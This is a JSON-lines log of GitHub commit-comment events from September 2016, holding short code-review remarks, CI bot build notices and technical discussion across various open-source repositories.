{"id":"4562420855","type":"CommitCommentEvent","actor":{"login":"rafaelfranca"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19020234,"position":null,"line":null,"path":null,"commit_id":"12d5c21031446686898d5bac924ff3e9e34b6a7d","created_at":"2016-09-14T14:47:24Z","updated_at":"2016-09-14T14:47:24Z","body":"Yeah, I'm waiting the build get green to do it"}},"created_at":"2016-09-14T14:47:24Z"}
{"id":"4562420978","type":"CommitCommentEvent","actor":{"login":"meibaorui"},"repo":{"name":"wanfangdata/guide"},"payload":{"comment":{"id":19020237,"position":null,"line":null,"path":null,"commit_id":"567de49b5ae1f710edeb9baacad6aa5c080ec3be","created_at":"2016-09-14T14:47:27Z","updated_at":"2016-09-14T14:47:27Z","body":"添加目录功能是怎么实现的？一定要有编号才行吗？"}},"created_at":"2016-09-14T14:47:27Z"}
{"id":"4562423877","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020244,"position":297,"line":328,"path":"murano/tests/unit/packages/hot_package/test_hot_package.py","commit_id":"238e32ab2c2fe09c5f242a752b86d5d0451e8271","created_at":"2016-09-14T14:47:52Z","updated_at":"2016-09-14T14:47:52Z","body":"No Asserts"}},"created_at":"2016-09-14T14:47:52Z"}
{"id":"4562425696","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020249,"position":null,"line":null,"path":null,"commit_id":"238e32ab2c2fe09c5f242a752b86d5d0451e8271","created_at":"2016-09-14T14:48:09Z","updated_at":"2016-09-14T14:48:09Z","body":"Need assertion"}},"created_at":"2016-09-14T14:48:09Z"}
{"id":"4562427408","type":"CommitCommentEvent","actor":{"login":"crufter"},"repo":{"name":"gocassa/gocassa"},"payload":{"comment":{"id":19020252,"position":16,"line":102,"path":"modifiers.go","commit_id":"22654e2bb3b664ac2ba1dd4c50388493754c2436","created_at":"2016-09-14T14:48:23Z","updated_at":"2016-09-14T14:48:23Z","body":"If that's the case I don't know why I had that error message. Doesn't matter I guess, it works now. Nice fix"}},"created_at":"2016-09-14T14:48:23Z"}
{"id":"4562431555","type":"CommitCommentEvent","actor":{"login":"sempervictus"},"repo":{"name":"daviswr/ZenPacks.daviswr.ZFS"},"payload":{"comment":{"id":19020266,"position":null,"line":null,"path":null,"commit_id":"44fbf4d1a341f477a1048d2a132ebbc06dbddac6","created_at":"2016-09-14T14:48:58Z","updated_at":"2016-09-14T14:48:58Z","body":"Thanks :-)"}},"created_at":"2016-09-14T14:48:58Z"}
{"id":"4562431690","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19020267,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T14:48:59Z","updated_at":"2016-09-14T14:48:59Z","body":"@snicolet The point is that when you do \r\n\r\n'''\r\nif (b)\r\n  ss |= pp;\r\n'''\r\n\r\nyou don't know of which color the piece on b is, it can by either a opponent piece or a friedly one.\r\nFor the pinners case (and that is the one we are interested in SEE) we are only interested in b when the piece in b is of different color of the sniper.\r\n"}},"created_at":"2016-09-14T14:48:59Z"}
{"id":"4562432185","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19020270,"position":null,"line":null,"path":null,"commit_id":"d47095bf5802214ac1e4fceb30aa4aa5cca78d58","created_at":"2016-09-14T14:49:05Z","updated_at":"2016-09-14T14:49:05Z","body":"function `parMap` adapted from http://www.2ality.com/2012/06/continuation-passing-style.html"}},"created_at":"2016-09-14T14:49:05Z"}
{"id":"4562436301","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19020278,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T14:49:40Z","updated_at":"2016-09-14T14:49:40Z","body":"@snicolet  I believe the test you are submitting ist not mature ..."}},"created_at":"2016-09-14T14:49:40Z"}
{"id":"4562436419","type":"CommitCommentEvent","actor":{"login":"psathyrella"},"repo":{"name":"psathyrella/partis"},"payload":{"comment":{"id":19020279,"position":null,"line":null,"path":null,"commit_id":"4a83cb8c9023da3a2fe30ee65610c593aa18e627","created_at":"2016-09-14T14:49:41Z","updated_at":"2016-09-14T14:49:41Z","body":"I can't remember off the top of my head what else has changed in the last\nsix months, but this alone makes a huge difference.\n\nOn smaller repertoires, it seems to be about twice as fast. On larger\nrepertoires (i.e. where typical inter-naive-rearrangement distance\napproaches the inherent granularity of rearrangement space [i.e. the\ndistance between potential germline rearrangments]) it seems to be quite a\nbit more than that. Previously most of our time on large samples was spent\ncalculating likelihoods for particularly slow cluster pairs. And, it turned\nout the slow comparisons were pretty much always when you compare two\nclusters with different cdr3 lengths, you have to integrate over much more\nk_v k_d space, and many more v/d/j genes.\n\nthere used to be an explicit cdr3 pre clustering step, but it fell by the\nwayside because I was totally sure the naive hamming distance pre\nclustering was accomplishing the same thing, and it's not really much\nslower to calculate naive hamming distance than cdr3 length. But, no dice\n-- there's actually tons of clusters whose naive sequences are close enough\nthat you have to calculate the likelihood (like, closer than 10% in a\ntypical case) but whose cdr3 lengths are different.\n\npresumably it'll use less memory, since it's calculating vastly fewer\nlikelihoods, but no guarantees.\n\nOn Tue, Sep 13, 2016 at 11:27 PM, Kristian Davidsen <\nnotifications@github.com> wrote:\n\n> Uhhh, how is the speed now compared to, say 6 month ago? Also are there\n> any change on the memory consumption? Maybe I should try it again again\n> instead of USEARCH.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/psathyrella/partis/commit/4a83cb8c9023da3a2fe30ee65610c593aa18e627#commitcomment-19013288>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC0rc3pkn9-lPOkxAlE9uFRZnvyMw98eks5qp5PSgaJpZM4J8UGF>\n> .\n>\n"}},"created_at":"2016-09-14T14:49:41Z"}
{"id":"4562438001","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020283,"position":34,"line":34,"path":"murano/tests/unit/api/middleware/test_ext_context.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T14:49:55Z","updated_at":"2016-09-14T14:49:55Z","body":"Add assert"}},"created_at":"2016-09-14T14:49:55Z"}
{"id":"4562440916","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19020289,"position":null,"line":null,"path":null,"commit_id":"ab2cbf6b88a8c87eb98b333cd7a7c7b5b26555a8","created_at":"2016-09-14T14:50:22Z","updated_at":"2016-09-14T14:50:22Z","body":":mans_shoe: "}},"created_at":"2016-09-14T14:50:22Z"}
{"id":"4562443327","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19020297,"position":null,"line":null,"path":null,"commit_id":"18513e1a2ae575aa87fa560b561646f6380eec45","created_at":"2016-09-14T14:50:42Z","updated_at":"2016-09-14T14:50:42Z","body":"lgetm, boring"}},"created_at":"2016-09-14T14:50:42Z"}
{"id":"4562443951","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020300,"position":35,"line":35,"path":"murano/tests/unit/api/middleware/test_fault_wrapper.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T14:50:48Z","updated_at":"2016-09-14T14:50:48Z","body":"Remove print"}},"created_at":"2016-09-14T14:50:48Z"}
{"id":"4562444032","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020301,"position":4,"line":4,"path":"ui/types.js","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T14:50:48Z","updated_at":"2016-09-14T14:50:48Z","body":"If you export an object rather than individual variables, you can simply do `import types from './types`:\r\n\r\n    export default {\r\n      REQUEST_MOVIE_LIST: 'REQUEST_MOVIE_LIST',\r\n      ...\r\n    }"}},"created_at":"2016-09-14T14:50:48Z"}
{"id":"4562445336","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19020306,"position":null,"line":null,"path":null,"commit_id":"0e9ec0e268f7c9dbea79223653c067b4776d0891","created_at":"2016-09-14T14:50:59Z","updated_at":"2016-09-14T14:50:59Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:50:59Z"}
{"id":"4562446713","type":"CommitCommentEvent","actor":{"login":"lpatiny"},"repo":{"name":"cheminfo-js/chromatography"},"payload":{"comment":{"id":19020311,"position":5,"line":77,"path":"test/cosine.js","commit_id":"a25e3691ef43ef292983b49a37e9c6a33b3a36f0","created_at":"2016-09-14T14:51:13Z","updated_at":"2016-09-14T14:51:13Z","body":"You should remove the only and maybe check that the testcase forbid it"}},"created_at":"2016-09-14T14:51:13Z"}
{"id":"4562450054","type":"CommitCommentEvent","actor":{"login":"svyandun"},"repo":{"name":"laravel/installer"},"payload":{"comment":{"id":19020319,"position":null,"line":null,"path":null,"commit_id":"04e92389f66dd6de831704b930ff70fae7a65b72","created_at":"2016-09-14T14:51:42Z","updated_at":"2016-09-14T14:51:42Z","body":"No, it hasn't. See https://github.com/laravel/installer/compare/v1.3.4...master"}},"created_at":"2016-09-14T14:51:42Z"}
{"id":"4562451319","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19020325,"position":null,"line":null,"path":null,"commit_id":"016ca761e0e79891ea6be5afa44bc2a142f3b1d3","created_at":"2016-09-14T14:51:53Z","updated_at":"2016-09-14T14:51:53Z","body":":octopus: "}},"created_at":"2016-09-14T14:51:53Z"}
{"id":"4562453658","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020331,"position":32,"line":1,"path":"ui/app.jsx","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T14:52:15Z","updated_at":"2016-09-14T14:52:15Z","body":"For your convenience we actually attach `React` to the `window` in `setup.jsx`. If your linter is complaining, you should add:\r\n\r\n    globals: {\r\n      React: true,\r\n    }"}},"created_at":"2016-09-14T14:52:15Z"}
{"id":"4562454220","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020336,"position":29,"line":29,"path":"murano/tests/unit/api/middleware/test_version_negotiation.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T14:52:20Z","updated_at":"2016-09-14T14:52:20Z","body":"Add assert"}},"created_at":"2016-09-14T14:52:20Z"}
{"id":"4562454953","type":"CommitCommentEvent","actor":{"login":"niranjanhalder"},"repo":{"name":"miraks/Tap-Translate"},"payload":{"comment":{"id":19020337,"position":null,"line":null,"path":null,"commit_id":"b4822de05819458f6631ee9bd37275115b574c85","created_at":"2016-09-14T14:52:27Z","updated_at":"2016-09-14T14:52:27Z","body":"You nic "}},"created_at":"2016-09-14T14:52:27Z"}
{"id":"4562456505","type":"CommitCommentEvent","actor":{"login":"niranjanhalder"},"repo":{"name":"miraks/Tap-Translate"},"payload":{"comment":{"id":19020339,"position":null,"line":null,"path":null,"commit_id":"b4822de05819458f6631ee9bd37275115b574c85","created_at":"2016-09-14T14:52:39Z","updated_at":"2016-09-14T14:52:39Z","body":"Niranjan"}},"created_at":"2016-09-14T14:52:39Z"}
{"id":"4562461537","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020349,"position":193,"line":46,"path":"ui/app.jsx","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T14:53:25Z","updated_at":"2016-09-14T14:53:25Z","body":"In general you should try to avoid adding whitespace inside of HTML tags. Whitespace will actually change how the text inside of your elements are rendered."}},"created_at":"2016-09-14T14:53:25Z"}
{"id":"4562462739","type":"CommitCommentEvent","actor":{"login":"swert-hon"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19020351,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T14:53:35Z","updated_at":"2016-09-14T14:53:35Z","body":"@martinwiboe Based on my brief testing, the word \"Absolute\" seems to have a different meaning here:\r\n```\r\n> var b = new Uri(\"http://www.example.com\");\r\n> var r = new Uri(b, \"?query=anna%20%26%20lotte&param2=true\");\r\n> r.AbsoluteUri\r\n\"http://www.example.com/?query=anna%20%26%20lotte&param2=true\"\r\n> r.ToString()\r\n\"http://www.example.com/?query=anna %26 lotte&param2=true\"\r\n```"}},"created_at":"2016-09-14T14:53:35Z"}
{"id":"4562464427","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"cheminfo-js/chromatography"},"payload":{"comment":{"id":19020355,"position":5,"line":77,"path":"test/cosine.js","commit_id":"a25e3691ef43ef292983b49a37e9c6a33b3a36f0","created_at":"2016-09-14T14:53:50Z","updated_at":"2016-09-14T14:53:50Z","body":"there is a rule for that in our default eslint config"}},"created_at":"2016-09-14T14:53:50Z"}
{"id":"4562464882","type":"CommitCommentEvent","actor":{"login":"kevin32"},"repo":{"name":"kevin32/Test"},"payload":{"comment":{"id":19020357,"position":null,"line":null,"path":null,"commit_id":"924ecd8472c71acd2cbe65585f91dc684eba9f8b","created_at":"2016-09-14T14:53:54Z","updated_at":"2016-09-14T14:53:54Z","body":"Cool!"}},"created_at":"2016-09-14T14:53:54Z"}
{"id":"4562470280","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19020374,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T14:54:41Z","updated_at":"2016-09-14T14:54:41Z","body":"I think that, combined with a proper reallocation of memory space for cvteam and the chooseproduction override fix. "}},"created_at":"2016-09-14T14:54:41Z"}
{"id":"4562475389","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19020391,"position":null,"line":null,"path":null,"commit_id":"3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83","created_at":"2016-09-14T14:55:26Z","updated_at":"2016-09-14T14:55:26Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T14:55:26Z"}
{"id":"4562476990","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020395,"position":135,"line":651,"path":"murano/tests/unit/api/v1/test_catalog.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T14:55:39Z","updated_at":"2016-09-14T14:55:39Z","body":"Bad no print"}},"created_at":"2016-09-14T14:55:39Z"}
{"id":"4562478461","type":"CommitCommentEvent","actor":{"login":"Seldaek"},"repo":{"name":"hwi/HWIOAuthBundle"},"payload":{"comment":{"id":19020399,"position":null,"line":null,"path":null,"commit_id":"0c7abffa1cf47a8e33733837b94495b629a424c1","created_at":"2016-09-14T14:55:50Z","updated_at":"2016-09-14T14:55:50Z","body":"Thanks! I hope there are no undocumented BC breaks :)"}},"created_at":"2016-09-14T14:55:50Z"}
{"id":"4562479933","type":"CommitCommentEvent","actor":{"login":"Thanood"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":19020403,"position":null,"line":null,"path":null,"commit_id":"9efddc28efb1ad2555bbd3e3ca0660814eadeeb8","created_at":"2016-09-14T14:56:03Z","updated_at":"2016-09-14T14:56:03Z","body":"btw, I put this in an issue: #273 "}},"created_at":"2016-09-14T14:56:03Z"}
{"id":"4562479985","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020404,"position":154,"line":1003,"path":"murano/tests/unit/api/v1/test_catalog.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T14:56:04Z","updated_at":"2016-09-14T14:56:04Z","body":"Print statement and no assert"}},"created_at":"2016-09-14T14:56:04Z"}
{"id":"4562484260","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"bin456789/Unblock163MusicClient-Xposed"},"payload":{"comment":{"id":19020415,"position":14,"line":115,"path":"app/src/main/java/bin/xposed/Unblock163MusicClient/Main.java","commit_id":"6b8a33aded667171a7a1768274713ce6f9931058","created_at":"2016-09-14T14:56:40Z","updated_at":"2016-09-14T14:56:40Z","body":"这个检测…………好野蛮…………"}},"created_at":"2016-09-14T14:56:40Z"}
{"id":"4562489339","type":"CommitCommentEvent","actor":{"login":"hydra"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19020424,"position":null,"line":null,"path":null,"commit_id":"2507b90a2827496fd9aae04624bc2a8aabbb64f3","created_at":"2016-09-14T14:57:25Z","updated_at":"2016-09-14T14:57:25Z","body":"Ok, for now, I will merge the PR as-is since existing scripts would break and also there's no way to create logical switches using bitwise operations on the taranis without scripting (at least, on the version I'm running here...)"}},"created_at":"2016-09-14T14:57:25Z"}
{"id":"4562493093","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020439,"position":36,"line":36,"path":".eslintrc.json","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T14:57:57Z","updated_at":"2016-09-14T14:57:57Z","body":"I'm glad you spent some time experimenting with eslint, but when you're working on a team using different eslint files defeats the purpose."}},"created_at":"2016-09-14T14:57:57Z"}
{"id":"4562494634","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19020444,"position":36,"line":374,"path":"youtube_dl/options.py","commit_id":"1b6712ab2378b2e8eb59f372fb51193f8d3bdc97","created_at":"2016-09-14T14:58:12Z","updated_at":"2016-09-14T14:58:12Z","body":"What's the purpose of this option? I mean is it really possible for several subsequent tries of the same login request to fail with `<pendingLogout` at all?\r\nI guess there are only 2 possible cases:\r\n1. When no tokens are loaded from cache, only one attempt is performed according to which login is either succeeds or fails.\r\n2. Tokens are loaded from cache. If an attempt with these tokens succeeds - it's fine. It it fails with `<pendingLogout` then second attempt is performed with no tokens from cache. If first request fails with any other error - it's an error.\r\nSo it turns out to be only two attempts max in case when cached tokens fail on the first attempt."}},"created_at":"2016-09-14T14:58:12Z"}
{"id":"4562494975","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19020447,"position":null,"line":null,"path":null,"commit_id":"3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83","created_at":"2016-09-14T14:58:15Z","updated_at":"2016-09-14T14:58:15Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T14:58:15Z"}
{"id":"4562496961","type":"CommitCommentEvent","actor":{"login":"Manderyth"},"repo":{"name":"Manderyth/musicapp"},"payload":{"comment":{"id":19020451,"position":null,"line":null,"path":null,"commit_id":"ffcd9d9cf484dc2b6211ecc8d64e03ca21273ac6","created_at":"2016-09-14T14:58:30Z","updated_at":"2016-09-14T14:58:30Z","body":"scrummaster said yes"}},"created_at":"2016-09-14T14:58:30Z"}
{"id":"4562499294","type":"CommitCommentEvent","actor":{"login":"taimur97"},"repo":{"name":"naman14/Timber"},"payload":{"comment":{"id":19020461,"position":null,"line":null,"path":null,"commit_id":"3aff0b01860c9966433f4234e03d53db31774207","created_at":"2016-09-14T14:58:50Z","updated_at":"2016-09-14T14:58:50Z","body":"merge"}},"created_at":"2016-09-14T14:58:50Z"}
{"id":"4562499336","type":"CommitCommentEvent","actor":{"login":"FritzBraunberger"},"repo":{"name":"FritzBraunberger/hello-world"},"payload":{"comment":{"id":19020462,"position":null,"line":null,"path":null,"commit_id":"28b261b6f1fa437690ba1257cb2afe5fd15fc148","created_at":"2016-09-14T14:58:50Z","updated_at":"2016-09-14T14:58:50Z","body":"merge into master"}},"created_at":"2016-09-14T14:58:50Z"}
{"id":"4562501445","type":"CommitCommentEvent","actor":{"login":"FritzBraunberger"},"repo":{"name":"FritzBraunberger/hello-world"},"payload":{"comment":{"id":19020468,"position":null,"line":null,"path":null,"commit_id":"28b261b6f1fa437690ba1257cb2afe5fd15fc148","created_at":"2016-09-14T14:59:10Z","updated_at":"2016-09-14T14:59:10Z","body":"good"}},"created_at":"2016-09-14T14:59:10Z"}
{"id":"4562505775","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020480,"position":142,"line":142,"path":"murano/tests/unit/api/v1/test_deployments.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T14:59:47Z","updated_at":"2016-09-14T14:59:47Z","body":"Fix a bit"}},"created_at":"2016-09-14T14:59:47Z"}
{"id":"4562508134","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"Splizard/minetest-mod-snow"},"payload":{"comment":{"id":19020486,"position":187,"line":479,"path":"src/mapgen_v6.lua","commit_id":"7774eb3f7f8dfb4504782b05cd71b8cc0ada9304","created_at":"2016-09-14T15:00:12Z","updated_at":"2016-09-14T15:00:12Z","body":"this code obviously was futile"}},"created_at":"2016-09-14T15:00:12Z"}
{"id":"4562508313","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19020488,"position":null,"line":null,"path":null,"commit_id":"7a7309219cae70e14f58e904591a77360bfbc985","created_at":"2016-09-14T15:00:14Z","updated_at":"2016-09-14T15:00:14Z","body":"That'd be fine."}},"created_at":"2016-09-14T15:00:14Z"}
{"id":"4562509231","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020492,"position":165,"line":165,"path":"murano/tests/unit/api/v1/test_deployments.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:00:22Z","updated_at":"2016-09-14T15:00:22Z","body":"Remove me"}},"created_at":"2016-09-14T15:00:22Z"}
{"id":"4562510642","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020497,"position":181,"line":181,"path":"murano/tests/unit/api/v1/test_deployments.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:00:34Z","updated_at":"2016-09-14T15:00:34Z","body":"Remove me"}},"created_at":"2016-09-14T15:00:34Z"}
{"id":"4562511587","type":"CommitCommentEvent","actor":{"login":"Maigre"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19020501,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-14T15:00:42Z","updated_at":"2016-09-14T15:00:42Z","body":"Hi,\ni did not succeed in building VLC again (spend couple hours trying by\ndifferent ways..)\nBUT i did found this page:\nhttps://nwgat.ninja/installing-mpv-with-hardware-decoding-on-raspberry-pi-1-2-3-zero/\nit is a DEB package of ffmpeg + mpv (another player) ready for the pi AND\nwith alsa support :)\n\nIt is also possible to compile it from source, and to use there libmpv to\nembed in other applications.\nIt definitly sounds like a good alternative to libvlc for the next HPlayer\nversion !\n\nI will dig into that, but right now you can use the DEBs provided to\ninstall the player.\nThe documentation for MPV player can be found here:\nhttps://mpv.io/manual/stable/\nLet me know if it works out for you !\n\nBest  Regards,\n\n\n2016-09-13 17:50 GMT+02:00 Vincent Berthiaume <notifications@github.com>:\n\n> sounds good, thank you so much!\n>\n> On Tue, Sep 13, 2016 at 11:49 AM, Maigre <notifications@github.com> wrote:\n>\n> > so i found it but i sadly did not compile it with static lib so it still\n> > require the custom recompiled version of libvlc which i do not have here.\n> > I'll try to recompile it properly and send it to you but it will take\n> some\n> > time (libvlc compiling takes couple hours...) i'll let you know if i end\n> up\n> > with something usable.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/vberthiaume/HPlayer/commit/\n> 7c92cda10413b951794d95208d420c4379698785#commitcomment-19003921>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/ADjIMdmpSrKSn2-\n> TLFn1nDMc2B4Luq48ks5qpsYcgaJpZM4J7ww8>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vberthiaume/HPlayer/commit/7c92cda10413b951794d95208d420c4379698785#commitcomment-19003942>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAq2wWJRb4QkHgtgeG8doyvZbl38ZL5Bks5qpsZUgaJpZM4J7ww8>\n> .\n>\n"}},"created_at":"2016-09-14T15:00:42Z"}
{"id":"4562512153","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19020506,"position":7,"line":233,"path":"plugins/CuraEngineBackend/CuraEngineBackend.py","commit_id":"76e57c940d9b8535ea71696f4ceddaf07f13296f","created_at":"2016-09-14T15:00:47Z","updated_at":"2016-09-14T15:00:47Z","body":"Ah, ehehehe, there's a typo in this string...\r\nI guess the translators will have to live with it."}},"created_at":"2016-09-14T15:00:47Z"}
{"id":"4562514029","type":"CommitCommentEvent","actor":{"login":"yht1995"},"repo":{"name":"tinkerfuroc/tk2_vision"},"payload":{"comment":{"id":19020509,"position":23,"line":56,"path":"tinker_depth_image_proc/src/nodelets/depth_outlier_removal.cpp","commit_id":"6e28c4caec5ab57ef54ec3bbe4c8107e71292f13","created_at":"2016-09-14T15:01:04Z","updated_at":"2016-09-14T15:01:04Z","body":"!!!"}},"created_at":"2016-09-14T15:01:04Z"}
{"id":"4562516402","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19020515,"position":null,"line":null,"path":null,"commit_id":"e57c7c521e8243a554c9cc96f79ea14b374c536d","created_at":"2016-09-14T15:01:28Z","updated_at":"2016-09-14T15:01:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1002](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13279&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T15:01:28Z"}
{"id":"4562518527","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020520,"position":56,"line":218,"path":"murano/tests/unit/api/v1/test_environments.py","commit_id":"2ebc412b3766df9f1875765d782f5516fb667dbc","created_at":"2016-09-14T15:01:47Z","updated_at":"2016-09-14T15:01:47Z","body":"Remove"}},"created_at":"2016-09-14T15:01:47Z"}
{"id":"4562521942","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19020528,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T15:02:20Z","updated_at":"2016-09-14T15:02:20Z","body":"@snicolet BTW Marco did not contradict my objection and suggested to test it, so I think the code is sound. Think about"}},"created_at":"2016-09-14T15:02:20Z"}
